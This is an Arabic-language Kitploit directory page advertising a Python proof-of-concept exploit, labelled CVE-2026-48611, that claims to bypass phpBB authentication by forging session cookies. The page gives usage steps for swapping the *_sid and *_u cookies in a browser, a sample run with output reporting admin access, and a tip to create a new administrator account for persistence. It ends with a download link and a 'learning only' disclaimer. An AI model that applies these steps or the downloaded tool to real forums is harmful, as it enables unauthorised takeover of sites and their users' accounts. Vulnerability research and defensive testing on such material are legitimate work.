Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-48611-phpBB — استغلال إثبات مفهوم بلغة Python يتجاوز المصادقة في phpBB 3.3.16 وما دون ذلك عبر تزوير ملفات تعريف ارتباط الجلسة للحصول على صلاحيات المسؤول. | Kitploit
أدوات/GitHubGitHub/lxdwnpiper/cve-2026-48611-phpbb
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالمصادقة
GitHublxdwnpiper/cve-2026-48611-phpbb

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-48611-phpBB

استغلال إثبات مفهوم بلغة Python يتجاوز المصادقة في phpBB 3.3.16 وما دون ذلك عبر تزوير ملفات تعريف ارتباط الجلسة للحصول على صلاحيات المسؤول.

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

CVE-2026-48611-phpBB

تجاوز المصادقة

نص بسيط لتجاوز المصادقة، إذا كنت تريد الوصول عبر المتصفح لا تنسَ تغيير متغير USER_AGENT في السكربت وفقًا لما يظهر في متصفحك حتى يعمل. استخدم محرر الكوكيز لاستبدال قيمة *_sid و *_u

المتأثر: phpBB 3.3.16 وما دون + 4.0.0-a2

phpbb  python3 exploit.py https://localhost:8000 joushk
[+] Target:  https://localhost:8000
[+] Target username: joushk
[+] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36

[+] Session cookies obtained:
    phpbb3_cl7ge_u: 2
    phpbb3_cl7ge_k: 
    phpbb3_cl7ge_sid: 4823a1ffeea59187eb31be1809ec0fd3
[+] User ID: 2
[!] User ID is 2 – default admin account.

[!] EXPLOIT SUCCESSFUL!
[!] You now have admin access.
[!] Note: ACP may still ask for password if re-authentication is enabled.
[+] tips: new create user and add to administrator group using bypass account auth and login to ACP Successd

[!!!هذا السكربت لأغراض التعلم فقط]

تنزيل الأداة